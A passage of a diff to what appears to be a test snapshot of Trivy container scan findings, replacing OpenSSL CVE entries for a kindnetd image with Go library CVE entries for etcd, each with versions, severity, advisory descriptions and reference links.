"https://bugzilla.redhat.com/2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-1", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-2", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5169", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220621.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-23840", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.3.7", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-38561", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-23840", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", - "https://github.com/advisories/GHSA-qgm6-9472-pwq7", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - "https://linux.oracle.com/cve/CVE-2021-23840.html", - "https://linux.oracle.com/errata/ELSA-2021-9561.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", - "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://ubuntu.com/security/notices/USN-4738-1", - "https://ubuntu.com/security/notices/USN-5088-1", - "https://www.cve.org/CVERecord?id=CVE-2021-23840", - "https://www.debian.org/security/2021/dsa-4855", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-03", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", + "https://access.redhat.com/security/cve/CVE-2021-38561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "https://deps.dev/advisory/OSV/GO-2021-0113", + "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "https://go.dev/cl/340830", + "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "https://groups.google.com/g/golang-announce", + "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "https://pkg.go.dev/golang.org/x/text/language", + "https://pkg.go.dev/vuln/GO-2021-0113", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2021-38561", ], }, "category": "Vulnerability", - "description": "Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "openssl: integer overflow in CipherUpdate", + "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23840", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23840", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://avd.aquasec.com/nvd/cve-2021-38561", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", + "value": "https://access.redhat.com/security/cve/CVE-2021-38561", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "value": "https://deps.dev/advisory/OSV/GO-2021-0113", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-qgm6-9472-pwq7", + "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "value": "https://go.dev/cl/340830", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-23840.html", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://pkg.go.dev/golang.org/x/text/language", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://pkg.go.dev/vuln/GO-2021-0113", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.3.8", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", + ], + }, + "category": "Vulnerability", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4738-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5088-1", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23840", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4855", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-03", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u7", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3712", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27191", + "installedVersion": "v0.0.0-20220131195533-30dcbda58838", + "packageName": "golang.org/x/crypto", "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", - "https://access.redhat.com/security/cve/CVE-2021-3712", - "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", - "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - "https://linux.oracle.com/cve/CVE-2021-3712.html", - "https://linux.oracle.com/errata/ELSA-2022-9023.html", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", - "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://ubuntu.com/security/notices/USN-5051-2", - "https://ubuntu.com/security/notices/USN-5051-3", - "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", - "https://ubuntu.com/security/notices/USN-5088-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3712", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", + "https://access.redhat.com/errata/RHSA-2022:8008", + "https://access.redhat.com/security/cve/CVE-2022-27191", + "https://bugzilla.redhat.com/1939485", + "https://bugzilla.redhat.com/1989564", + "https://bugzilla.redhat.com/1989570", + "https://bugzilla.redhat.com/1989575", + "https://bugzilla.redhat.com/2064702", + "https://bugzilla.redhat.com/2121445", + "https://bugzilla.redhat.com/2121453", + "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "https://go.dev/cl/392355", + "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "https://linux.oracle.com/cve/CVE-2022-27191.html", + "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "https://pkg.go.dev/vuln/GO-2021-0356", + "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "https://security.netapp.com/advisory/ntap-20220429-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-27191", ], }, "category": "Vulnerability", - "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "openssl: Read buffer overruns processing ASN.1 strings", + "name": "crash in a golang.org/x/crypto/ssh server", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3712", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3712", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", + "value": "https://avd.aquasec.com/nvd/cve-2022-27191", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", + "value": "https://access.redhat.com/errata/RHSA-2022:8008", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", + "value": "https://access.redhat.com/security/cve/CVE-2022-27191", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", + "value": "https://bugzilla.redhat.com/1939485", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "value": "https://bugzilla.redhat.com/1989564", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", + "value": "https://bugzilla.redhat.com/1989570", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", + "value": "https://bugzilla.redhat.com/1989575", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "value": "https://bugzilla.redhat.com/2064702", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "value": "https://bugzilla.redhat.com/2121445", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "value": "https://bugzilla.redhat.com/2121453", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "value": "https://go.dev/cl/392355", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", + "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-2", + "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-3", + "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5088-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1d-0+deb10u8", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0778", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "https://access.redhat.com/errata/RHSA-2022:5326", - "https://access.redhat.com/security/cve/CVE-2022-0778", - "https://bugzilla.redhat.com/2062202", - "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", - "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", - "https://errata.almalinux.org/8/ALSA-2022-5326.html", - 